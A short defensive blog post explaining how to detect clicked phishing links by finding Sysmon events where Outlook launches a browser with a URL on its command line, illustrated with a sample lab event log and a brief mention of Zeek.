Hunting Phishing URLs in Emails with Sysmon
Let’s Connect | LinkedIn | Twitter
Being an important attack vector, phishing emails are hard to detect. Thanks to Microsoft Sysmon, we can track or detect phishing attacks.
Sample phishing URL scenario:
1. User receives an email that has a link in it.
2. User clicks the link
3. User connects to the URL with the default browser.
4. Other actions are performed(file download, running malicious code, etc.).
Since the actions on step 4 can vary, it can be more practical to collect and analyze those clicked URLs inside an email.
So, let’s look at what happens when a user clicks a link within Outlook. When a user clicks a link within Outlook, the following Sysmon event is generated:
ProcessId: 5552
Image: C:\Program Files\internet explorer\iexplore.exe
FileVersion: 11.00.17134.1 (WinBuild.160101.0800)
Description: Internet Explorer
Product: Internet Explorer
Company: Microsoft Corporation
CommandLine: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.xyz.com/test/index.html
CurrentDirectory: C:\Users\vagrant.WINDOMAIN\Documents\
User: WINDOMAIN\vagrant
LogonGuid: {16886C20-BC08-5C5E-0000-0020BB98AA11}
LogonId: 0x11AA98BB
TerminalSessionId: 2
IntegrityLevel: High
Hashes: MD5=6465CB92B25A7BC1DF8E01D8AC5E7596,SHA256=C8DF7006DCB7239AA9CE3124F03B48613719D243C24D805483001D7006422C55
ParentProcessGuid: {16886C20-6192-5C61-0000-0010A0BDCB1A}
ParentProcessId: 12284
ParentImage: C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE
ParentCommandLine: "C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXE"The following part is important for us:
CommandLine: "C:\Program Files\Internet Explorer\iexplore.exe" https://www.xyz.com/test/index.html
ParentImage: C:\Program Files\Microsoft Office\Office15\OUTLOOK.EXEBy using this condition; you can parse, enrich the logs and analyze these URLs. You can further correlate these events with the events generated in step 4 above.
An alternative method for detecting this activity is using Bro(Zeek) for logging URLs in emails and correlating them with firewall/proxy logs but you should be careful about HTTPS traffic. If you don’t perform HTTPS inspection on your firewall/proxy, it’s hard to detect this activity.
